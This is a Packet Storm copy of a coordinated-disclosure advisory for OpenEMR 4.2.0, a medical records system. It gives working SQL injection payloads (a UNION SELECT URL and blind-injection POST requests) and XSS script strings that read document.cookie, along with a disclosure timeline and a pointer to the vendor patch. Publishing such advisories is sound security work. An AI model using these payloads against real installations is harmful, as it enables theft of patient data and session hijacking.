what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

openEMR 4.2.0 Cross Site Scripting / SQL Injection

openEMR 4.2.0 Cross Site Scripting / SQL Injection
Posted Mar 24, 2015
Authored by Steffen Roesemann

openEMR version 4.2.0 suffers from cross site scripting and remote SQL injection vulnerabilities.

tags | exploit, remote, vulnerability, xss, sql injection
SHA-256 | 136128c86a8cdf2ba34308166c5782a4d4d518a5c95d5d6c966b0e3831d31b38

openEMR 4.2.0 Cross Site Scripting / SQL Injection

Change Mirror Download
Advisory: Multiple reflecting/stored XSS- and SQLi-vulnerabilities in
openEMR v.4.2.0
Advisory ID: SROEADV-2015-08
Author: Steffen Rösemann
Affected Software: openEMR v.4.2.0 (Release-date: 28th Dec 2014)
Vendor URL: http://www.open-emr.org
Vendor Status: patched
CVE-ID: to be assigned after release of advisory via OSS list

==========================
Vulnerability Description:
==========================

Electronic health records and medical practice management application
OpenEMR 4.2.0 suffers from multiple SQL injection and reflecting XSS
vulnerabilities.

==================
Technical Details:
==================

All below described vulnerabilities can only be exploited by an already
authenticated user.

=====================
SQL injection vulnerabilities
=====================

An SQL injection vulnerability can be found in the facility_admin.php file
and can be abused by an attacker via the fid-parameter.

Exploit-Example:

http://
{TARGET}/interface/usergroup/facility_admin.php?fid=3%27+and+1=2+union+select+1,user%28%29,3,4,version%28%29,database%28%29,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+--+



Another (blind) SQL injection vulnerability resides in the
appt_encounter_report.php an can be abused by an attacker by modifying a
the form_facility-parameter in a POST-request.

Exploit-Example:

POST /openemr-4.2.0/interface/reports/appt_encounter_report.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101
Firefox/31.0 Iceweasel/31.3.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer:
http://localhost/openemr-4.2.0/interface/reports/appt_encounter_report.php
Cookie: OpenEMR=p30d0tu19a9r04tjgnuu1oqqq4
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 120

form_facility=3%27+AND+substring(version(),1,1)=%275&form_from_date=2015-01-13&form_to_date=2015-01-13&form_refresh=true


The last (blind) SQL injection vulnerability resides in the
appointments_report.php-file and can be as well abused by an attacker via
crafting own SQL statements in the form_facility-parameter in a POST
request.


Exploit-Example:

POST /openemr-4.2.0/interface/reports/appointments_report.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101
Firefox/31.0 Iceweasel/31.3.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer:
http://localhost/openemr-4.2.0/interface/reports/appointments_report.php
Cookie: OpenEMR=p30d0tu19a9r04tjgnuu1oqqq4
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 199

form_facility=3%27+and+substring(version(),1,1)=%274&form_provider=&form_from_date=2015-01-13&form_to_date=2015-01-13&form_apptstatus=&form_apptcat=ALL&form_orderby=comment&patient=&form_refresh=true


==============
XSS vulnerabilities
==============

A reflecting XSS-vulnerability can be found in user_admin.php via the
id-parameter.

Exploit-Example:

http://
{TARGET}interface/usergroup/user_admin.php?id=4%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E



A stored XSS vulnerability resides in add_edit_event.php via the
input-field "form_comments" and is executed in appointments_report.php.


Exploit-Example:

<script>alert(document.cookie)</script>




=========
Solution:
=========

Install the latest patch (released 21st March 2015, see [3]).


====================
Disclosure Timeline:
====================

12/13-Jan-2015 – found the vulnerability
13-Jan-2015 - informed the developers
13-Jan-2015 – release date of this security advisory [without technical
details]
13-Jan-2015 - vendor responded and announced a patch
20-Jan-2015 - vendor provides fix for testing purposes
20-Jan-2015 - agreement to release technical details when patch has been
released
21-Mar-2015 – release date of the patch
22-Mar-2015 – release date of this security advisory
22-Mar-2015 – send to FullDisclosure



========
Credits:
========

Vulnerabilities found and advisory written by Steffen Rösemann.

===========
References:
===========

[1] http://www.open-emr.org
[2] http://sroesemann.blogspot.de/2015/01/sroeadv-2015-08.html
[3] http://www.open-emr.org/wiki/index.php/OpenEMR_Patches


Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close